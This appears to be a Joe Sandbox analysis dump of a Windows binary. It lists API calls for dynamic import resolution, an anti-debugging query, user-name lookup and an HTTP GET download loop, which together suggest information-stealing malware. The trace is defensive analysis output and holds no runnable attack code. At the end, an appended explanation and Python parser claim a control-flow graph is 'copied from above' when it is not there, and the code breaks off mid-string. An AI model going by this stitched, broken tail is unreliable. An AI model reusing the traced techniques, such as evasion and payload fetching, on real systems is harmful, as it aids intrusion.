2c97915 43 API calls ctype 32164 2c99836 170 API calls setSBUpLow 32034 408c9e memcpy 32074 2c79327 19 API calls 32075 2c8cf29 CoCreateInstance MultiByteToWideChar lstrcpyn 32116 2c9982e 6 API calls 2 library calls 32165 2c71920 194 API calls 32035 2c81620 406 API calls 32076 2c86f20 142 API calls 32166 2c83d20 238 API calls 32037 2c93627 GetSystemInfo wsprintfA 32117 2c92027 2173 API calls 32167 2c94d27 32 API calls 32168 2c97d27 5 API calls 3 library calls 32118 2c89027 StrCmpCA ExitProcess strtok_s strtok_s 32038 425cb0 9 API calls 32039 2c77617 VirtualProtect 32169 2c8893b strtok_s strtok_s 32119 2c8503e 290 API calls 32120 2c9982f 173 API calls 2 library calls 32078 2c8f73f 91 API calls 32080 2c8c732 22 API calls
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00404C7F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404CD2
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D05
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D35
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404D73
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00404DA6
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DB6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$InternetOpen
                                                      • String ID: "$------$_B
                                                      • API String ID: 2041821634-1334066325
                                                      • Opcode ID: 88c742818b550997190ea262b8b3dfeddd329f6163519cbaa13a339a61b6e4e3
                                                      • Instruction ID: 1552433d623cc160f1fdc82636420e70867d0f7256f5daceb05b59e833827d7b
                                                      • Opcode Fuzzy Hash: 88c742818b550997190ea262b8b3dfeddd329f6163519cbaa13a339a61b6e4e3
                                                      • Instruction Fuzzy Hash: 64528E71A002169BDB21EBA5DD89A9F7BB5AF44304F14103AF905B72D1DB78EC418FE8

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A74
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A82
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A89
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A90
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00404AA2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB2
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC0
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AC7
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ACE
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AD9
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE0
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AE7
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AEE
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AF5
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B0B
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B12
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B19
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B20
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B27
                                                      • LdrInitializeThunk.NTDLL ref: 00404B2F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B53
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B5A
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B61
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B68
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B6F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B7F
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B86
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B8D
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B94
                                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404B9B
                                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404BB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
                                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                      • API String ID: 2971326882-3329630956
                                                      • Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction ID: 76e4e72d54844b5f718d0498cf6af46f704a1995843b300e33b80144487799f7
                                                      • Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction Fuzzy Hash: 3431E7A0B4021C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA

                                                      Control-flow Graph

Basic blocks of 4265a0 (address range, APIs called in the block, successor blocks):
4265a0-4265cd GetPEB -> 4267d3 | 4265d3
4265d3-4267ce call 426500, GetProcAddress x 20 -> 4267d3
4267d3-426833 LoadLibraryA x 5 -> 426835 | 426848
426835-426843 GetProcAddress -> 426848
426848-42684f -> 426851 | 42687c
426851-426877 GetProcAddress x 2 -> 42687c
42687c-426883 -> 426885 | 426898
426885-426893 GetProcAddress -> 426898
426898-42689f -> 4268a1 | 4268b4
4268a1-4268af GetProcAddress -> 4268b4
4268b4-4268bb -> 4268e7 | 4268bd
4268bd-4268e2 GetProcAddress x 2 -> 4268e7
4268e7-4268ea (no successor listed)
                                                      APIs
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1E8), ref: 004265F9
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A200), ref: 00426612
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A218), ref: 0042662A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A368), ref: 00426642
                                                      • GetProcAddress.KERNEL32(74DD0000,02D65E00), ref: 0042665B
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64088), ref: 00426673
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64408), ref: 0042668B
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A110), ref: 004266A4
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A0B0), ref: 004266BC
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A380), ref: 004266D4
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A2D8), ref: 004266ED
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64308), ref: 00426705
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A0F8), ref: 0042671D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1B8), ref: 00426736
                                                      • GetProcAddress.KERNEL32(74DD0000,02D640A8), ref: 0042674E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A098), ref: 00426766
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A1D0), ref: 0042677F
                                                      • GetProcAddress.KERNEL32(74DD0000,02D642E8), ref: 00426797
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A188), ref: 004267AF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64128), ref: 004267C8
                                                      • LoadLibraryA.KERNEL32(02D8A320,?,?,?,00421DD3), ref: 004267D9
                                                      • LoadLibraryA.KERNEL32(02D8A290,?,?,?,00421DD3), ref: 004267EB
                                                      • LoadLibraryA.KERNEL32(02D8A278,?,?,?,00421DD3), ref: 004267FD
                                                      • LoadLibraryA.KERNEL32(02D8A230,?,?,?,00421DD3), ref: 0042680E
                                                      • LoadLibraryA.KERNEL32(02D8A248,?,?,?,00421DD3), ref: 00426820
                                                      • GetProcAddress.KERNEL32(75A70000,02D8A338), ref: 0042683D
                                                      • GetProcAddress.KERNEL32(75290000,02D8A140), ref: 00426859
                                                      • GetProcAddress.KERNEL32(75290000,02D8A2A8), ref: 00426871
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8A128), ref: 0042688D
                                                      • GetProcAddress.KERNEL32(75450000,02D64288), ref: 004268A9
                                                      • GetProcAddress.KERNEL32(76E90000,02D65E40), ref: 004268C5
                                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004268DC
                                                      Strings
                                                      • NtQueryInformationProcess, xrefs: 004268D1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: NtQueryInformationProcess
                                                      • API String ID: 2238633743-2781105232

                                                      Control-flow Graph

                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422C3F
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00422C46
                                                      • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422C5A
                                                      Similarity
                                                      • API ID: Heap$AllocNameProcessUser
                                                      • String ID:
                                                      • API String ID: 1206570057-0

                                                      Control-flow Graph

                                                      APIs
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64168), ref: 00426905
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64188), ref: 0042691D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3E0), ref: 00426936
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3B0), ref: 0042694E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A3C8), ref: 00426966
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A458), ref: 0042697F
                                                      • GetProcAddress.KERNEL32(74DD0000,02D69140), ref: 00426997
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A428), ref: 004269AF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8A398), ref: 004269C8
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D998), ref: 004269E0
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D9B0), ref: 004269F8
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64348), ref: 00426A11
                                                      • GetProcAddress.KERNEL32(74DD0000,02D641C8), ref: 00426A29
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64368), ref: 00426A41
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64208), ref: 00426A5A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D980), ref: 00426A72
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D968), ref: 00426A8A
                                                      • GetProcAddress.KERNEL32(74DD0000,02D69168), ref: 00426AA3
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64228), ref: 00426ABB
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D950), ref: 00426AD3
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D920), ref: 00426AEC
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D8F0), ref: 00426B04
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D908), ref: 00426B1C
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64388), ref: 00426B35
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D938), ref: 00426B4D
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D788), ref: 00426B65
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D710), ref: 00426B7E
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6B0), ref: 00426B96
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D728), ref: 00426BAE
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6F8), ref: 00426BC7
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D800), ref: 00426BDF
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D740), ref: 00426BF7
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D758), ref: 00426C10
                                                      • GetProcAddress.KERNEL32(74DD0000,02D686F0), ref: 00426C28
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D6C8), ref: 00426C40
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D770), ref: 00426C59
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643A8), ref: 00426C71
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D5F0), ref: 00426C89
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643C8), ref: 00426CA2
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D7A0), ref: 00426CBA
                                                      • GetProcAddress.KERNEL32(74DD0000,02D8D8A8), ref: 00426CD2
                                                      • GetProcAddress.KERNEL32(74DD0000,02D643E8), ref: 00426CEB
                                                      • GetProcAddress.KERNEL32(74DD0000,02D64028), ref: 00426D03
                                                      • LoadLibraryA.KERNEL32(02D8D848,004206EF,?,00422075), ref: 00426D15
                                                      • LoadLibraryA.KERNEL32(02D8D6E0,?,00422075), ref: 00426D26
                                                      • LoadLibraryA.KERNEL32(02D8D7D0,?,00422075), ref: 00426D38
                                                      • LoadLibraryA.KERNEL32(02D8D7B8,?,00422075), ref: 00426D4A
                                                      • LoadLibraryA.KERNEL32(02D8D608,?,00422075), ref: 00426D5B
                                                      • LoadLibraryA.KERNEL32(02D8D7E8,?,00422075), ref: 00426D6D
                                                      • LoadLibraryA.KERNEL32(02D8D818,?,00422075), ref: 00426D7F
                                                      • LoadLibraryA.KERNEL32(02D8D8C0,?,00422075), ref: 00426D90
                                                      • GetProcAddress.KERNEL32(75290000,02D64048), ref: 00426DAC
                                                      • GetProcAddress.KERNEL32(75290000,02D8D860), ref: 00426DC4
                                                      • GetProcAddress.KERNEL32(75290000,02D8A5D0), ref: 00426DDD
                                                      • GetProcAddress.KERNEL32(75290000,02D8D830), ref: 00426DF5
                                                      • GetProcAddress.KERNEL32(75290000,02D64588), ref: 00426E0D
                                                      • GetProcAddress.KERNEL32(73B40000,02D69190), ref: 00426E2D
                                                      • GetProcAddress.KERNEL32(73B40000,02D64568), ref: 00426E45
                                                      • GetProcAddress.KERNEL32(73B40000,02D68C68), ref: 00426E5E
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D878), ref: 00426E76
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D8D8), ref: 00426E8E
                                                      • GetProcAddress.KERNEL32(73B40000,02D64428), ref: 00426EA7
                                                      • GetProcAddress.KERNEL32(73B40000,02D64628), ref: 00426EBF
                                                      • GetProcAddress.KERNEL32(73B40000,02D8D620), ref: 00426ED7
                                                      • GetProcAddress.KERNEL32(752C0000,02D647C8), ref: 00426EF3
                                                      • GetProcAddress.KERNEL32(752C0000,02D64448), ref: 00426F0B
                                                      • GetProcAddress.KERNEL32(752C0000,02D8D650), ref: 00426F24
                                                      • GetProcAddress.KERNEL32(752C0000,02D8D890), ref: 00426F3C
                                                      • GetProcAddress.KERNEL32(752C0000,02D647A8), ref: 00426F54
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68D30), ref: 00426F74
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68C90), ref: 00426F8C
                                                      • GetProcAddress.KERNEL32(74EC0000,02D8D638), ref: 00426FA5
                                                      • GetProcAddress.KERNEL32(74EC0000,02D64728), ref: 00426FBD
                                                      • GetProcAddress.KERNEL32(74EC0000,02D64668), ref: 00426FD5
                                                      • GetProcAddress.KERNEL32(74EC0000,02D68D58), ref: 00426FEE
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D668), ref: 0042700E
                                                      • GetProcAddress.KERNEL32(75BD0000,02D64508), ref: 00427026
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8A680), ref: 0042703F
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D680), ref: 00427057
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8D698), ref: 0042706F
                                                      • GetProcAddress.KERNEL32(75BD0000,02D644C8), ref: 00427088
                                                      • GetProcAddress.KERNEL32(75BD0000,02D645A8), ref: 004270A0
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8DC20), ref: 004270B8
                                                      • GetProcAddress.KERNEL32(75BD0000,02D8DB78), ref: 004270D1
                                                      • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 004270E7
                                                      • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 004270FE
                                                      • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00427115
                                                      • GetProcAddress.KERNEL32(75A70000,02D645C8), ref: 00427131
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB18), ref: 00427149
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DC80), ref: 00427162
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB00), ref: 0042717A
                                                      • GetProcAddress.KERNEL32(75A70000,02D8DB60), ref: 00427192
                                                      • GetProcAddress.KERNEL32(75450000,02D64648), ref: 004271AE
                                                      • GetProcAddress.KERNEL32(75450000,02D64468), ref: 004271C6
                                                      • GetProcAddress.KERNEL32(75DA0000,02D64488), ref: 004271E2
                                                      • GetProcAddress.KERNEL32(75DA0000,02D8DB90), ref: 004271FA
                                                      • GetProcAddress.KERNEL32(6F070000,02D644E8), ref: 0042721A
                                                      • GetProcAddress.KERNEL32(6F070000,02D644A8), ref: 00427232
                                                      • GetProcAddress.KERNEL32(6F070000,02D64528), ref: 0042724B
                                                      • GetProcAddress.KERNEL32(6F070000,02D8DA58), ref: 00427263
                                                      • GetProcAddress.KERNEL32(6F070000,02D64788), ref: 0042727B
                                                      • GetProcAddress.KERNEL32(6F070000,02D64548), ref: 00427294
                                                      • GetProcAddress.KERNEL32(6F070000,02D645E8), ref: 004272AC
                                                      • GetProcAddress.KERNEL32(6F070000,02D64608), ref: 004272C4
                                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004272DB
                                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004272F2
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DAB8), ref: 0042730E
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8A620), ref: 00427326
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DBA8), ref: 0042733F
                                                      • GetProcAddress.KERNEL32(75AF0000,02D8DBD8), ref: 00427357
                                                      • GetProcAddress.KERNEL32(75D90000,02D64708), ref: 00427373
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DA88), ref: 0042738F
                                                      • GetProcAddress.KERNEL32(6C390000,02D64688), ref: 004273A7
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DBC0), ref: 004273C0
                                                      • GetProcAddress.KERNEL32(6C390000,02D8DC50), ref: 004273D8
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                                      • API String ID: 2238633743-3468015613
                                                      APIs
                                                      • lstrlenA.KERNEL32(0042CFF4,00000001,00000000,00000000), ref: 0041F3B5
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3D1
                                                      • lstrlenA.KERNEL32(0042CFF4), ref: 0041F3DC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F3F5
                                                      • lstrlenA.KERNEL32(0042CFF4), ref: 0041F400
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F419
                                                      • lstrcpy.KERNEL32(00000000,00434FA8), ref: 0041F43E
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F46C
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4A0
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0041F4D0
                                                      • lstrlenA.KERNEL32(02D642A8), ref: 0041F4F5
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: ERROR
                                                      • API String ID: 367037083-2861137601

                                                      Control-flow Graph

                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,block,?,00000000,?,?,0042096B), ref: 00418E0A
                                                      • ExitProcess.KERNEL32 ref: 00418E17
                                                      • strtok_s.MSVCRT ref: 00418E29
                                                      Similarity
                                                      • API ID: ExitProcessstrtok_s
                                                      • String ID: block$kB
                                                      • API String ID: 3407564107-744917121

                                                      Control-flow Graph

                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406C6F
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00406CC2
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 00406CD5
                                                      • StrCmpCA.SHLWAPI(?,02D8F9D0), ref: 00406CED
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406D15
                                                      • HttpOpenRequestA.WININET(00000000,GET,?,02D8F0D0,00000000,00000000,-00400100,00000000), ref: 00406D50
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406D77
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406D86
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406DA5
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406DFF
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406E5B
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406E7D
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406E8E
                                                      • InternetCloseHandle.WININET(?), ref: 00406E98
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406EA2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00406EC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR$GET
                                                      • API String ID: 3687753495-3591763792
                                                      • Opcode ID: 67ee71012cb14109d988e1c8478ae4d4d29fdfc9c3cce4a492d2a323f489cf07
                                                      • Instruction ID: 8a907297e25ef71cd4293b5d859979f41ab2109233d0e0d0d40ab909daed6b9d
                                                      • Opcode Fuzzy Hash: 67ee71012cb14109d988e1c8478ae4d4d29fdfc9c3cce4a492d2a323f489cf07
                                                      • Instruction Fuzzy Hash: 3A816F71B01315ABEB20DFA4DC89BAF77B5AF44700F154069F905B72C0DBB8AD058BA8
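The text form of each control-flow graph above (a decimal block id, the block's address or address range, the API or `call` annotations for that block, then `src->dst` edges) can be parsed to recover the order in which the WinINet APIs are reached on the way to InternetReadFile, which is the HTTP GET download loop of the 406c40 function. The following Python is an added example and not part of the Joe Sandbox report; its input is the 406c40 graph copied from above, and the tokenisation rules (a decimal id followed by a hex range opens a block, `call X` and `* N` are consumed as pairs, anything else is an API name attached to the current block) are inferred from this dump rather than from a published format specification.

```python
"""Parse a Joe Sandbox control-flow graph text dump and list the external APIs
hit on the shortest path from the function entry to a chosen API.
Added example; the parsing rules are an assumption inferred from the dump."""
from collections import deque
import re

# Graph of function 406c40, copied from the report above and re-flowed.
CFG_406C40 = """
control_flow_graph 1627 406c40-406c64 call 402930 1630 406c75-406c97 call 404bc0 1627->1630
1631 406c66-406c6b 1627->1631 1635 406c99 1630->1635 1636 406caa-406cba call 402930 1630->1636
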